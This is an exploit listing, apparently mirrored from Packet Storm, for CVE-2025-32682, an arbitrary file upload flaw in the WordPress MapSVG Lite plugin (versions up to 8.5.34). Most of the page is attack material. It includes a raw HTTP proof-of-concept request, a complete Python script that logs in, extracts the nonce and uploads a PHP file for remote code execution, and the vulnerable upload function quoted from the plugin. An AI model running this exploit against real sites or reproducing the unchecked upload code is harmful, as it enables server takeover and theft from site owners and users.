WordPress MapSVG Lite 8.5.34 Shell Upload

April 19, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title WordPress MapSVG Lite 8.5.34 Shell Upload
Exploit ID PACKETSTORM:190569
Type packetstorm
Published 2025-04-18T00:00:00
Modified 2025-04-18T00:00:00

CVSS Information

CVSS Score 9.9
Severity CRITICAL
Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE Information

  • CVE-2025-32682

Exploit Description

WordPress MapSVG Lite…

Exploit Code

# 🐚 CVE-2025-32682 – Arbitrary File Upload in MapSVG Lite <= 8.5.34 ## 📌 Plugin Details
– **Name:** MapSVG Lite
– **Affected Version:** <= 8.5.34
– **Vulnerability Type:** Arbitrary File Upload
– **CVE ID:** CVE-2025-32682
– **Published Date:** 15 April, 2025
– **CVSS Score:** 9.9 (Critical)

## 💥 Vulnerability Summary
The `MapSVG Lite` plugin for WordPress does not validate file types when uploading SVG files via its REST API endpoint:

“`
/wp-json/mapsvg/v1/svgfile
“`

This allows an authenticated attacker (Subscriber+) to upload arbitrary PHP files disguised as SVG, resulting in remote code execution (RCE).

## 📎 Proof of Concept (POC) – Raw HTTP Request
“`http
POST /wp-json/mapsvg/v1/svgfile HTTP/1.1

Host: 192.168.100.74:888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://target.com/wp-admin/admin.php?page=mapsvg-config

X-WP-Nonce: 4febb3ff50

X-Requested-With: XMLHttpRequest

Content-Type: multipart/form-data; boundary=—————————155355665422604566641836454807

Content-Length: 298

Origin: http://192.168.100.74:888

Connection: keep-alive

Cookie:

—————————–155355665422604566641836454807

Content-Disposition: form-data; name=”file”; filename=”nxploit.php”

Content-Type: text/xml

—————————–155355665422604566641836454807–

“`

### 🔍 Vulnerable Code Snippet
The following vulnerable code snippet from the `mapsvg-lite-interactive-vector-maps.php` file highlights the issue:
“`php
public function uploadSVG() {
$file = $_FILES[‘file’];
$upload = wp_upload_bits($file[‘name’], null, file_get_contents($file[‘tmp_name’]));
return new \WP_REST_Response([“file” => $upload], 200);
}
“`
– ❌ **No filetype check**
– ❌ **No extension validation**
– ❌ **No sanitization of file contents**

This function is directly mapped to the REST endpoint `/wp-json/mapsvg/v1/svgfile`.

## 🧠 Exploitation Requirements
– ✅ Requires authentication (Subscriber+)
– 🛑 No filetype or content validation

## 🐍 POC 2 – Python Exploit Script
“`python
# By: Nxploited | Khaled Alenazi
import requests
import argparse
import re

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36”

parser = argparse.ArgumentParser()
parser.add_argument(“-u”, “–url”, required=True)
parser.add_argument(“-un”, “–username”, required=True)
parser.add_argument(“-p”, “–password”, required=True)
args = parser.parse_args()

login_url = f”{args.url}/wp-login.php”
resp = session.post(login_url, data={
‘log’: args.username,
‘pwd’: args.password,
‘rememberme’: ‘forever’,
‘wp-submit’: ‘Log In’
}, headers={“User-Agent”: user_agent})

if ‘wordpress_logged_in’ not in str(session.cookies):
print(“[-] Login failed”)
exit()
print(“[+] Logged in successfully.”)

nonce_page = session.get(f”{args.url}/wp-admin/admin.php?page=mapsvg-config”)
match = re.search(r'”nonce”:”([a-f0-9]+)”‘, nonce_page.text)
if not match:
print(“[-] Failed to extract nonce”)
exit()
nonce = match.group(1)
print(f”[+] Found nonce: {nonce}”)

upload_url = f”{args.url}/wp-json/mapsvg/v1/svgfile”
print(f”[+] Uploading file to: {upload_url}”)

payload = {‘file’: (‘nxploit.php’, ‘‘, ‘application/x-php’)}
headers = {
‘X-WP-Nonce’: nonce,
‘Referer’: f”{args.url}/wp-admin/admin.php?page=mapsvg-config”,
‘X-Requested-With’: ‘XMLHttpRequest’,
‘User-Agent’: user_agent
}

res = session.post(upload_url, files=payload, headers=headers)

try:
json_res = res.json()
print(“[+] Server response (formatted):”)
print(“File Name :”, json_res[‘file’][‘name’])
print(“URL :”, json_res[‘file’][‘relativeUrl’])
print(“Path Short :”, json_res[‘file’][‘pathShort’])
print(“Server Path :”, json_res[‘file’][‘serverPath’])
print(“\nExploited By : Nxploited | Khaled Alenazi”)
except:
print(“[-] Upload failed or invalid response.”)
“`

## ☠️ Impact
Exploitation of this vulnerability allows an attacker to upload a `.php` web shell to the `/wp-content/uploads/mapsvg/` directory and execute arbitrary commands on the server.

## 👤 By:

**Nxploited | Khaled Alenazi**

## ⚠️ Disclaimer
This project is for **educational purposes only**. Unauthorized access to systems without permission is illegal.

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.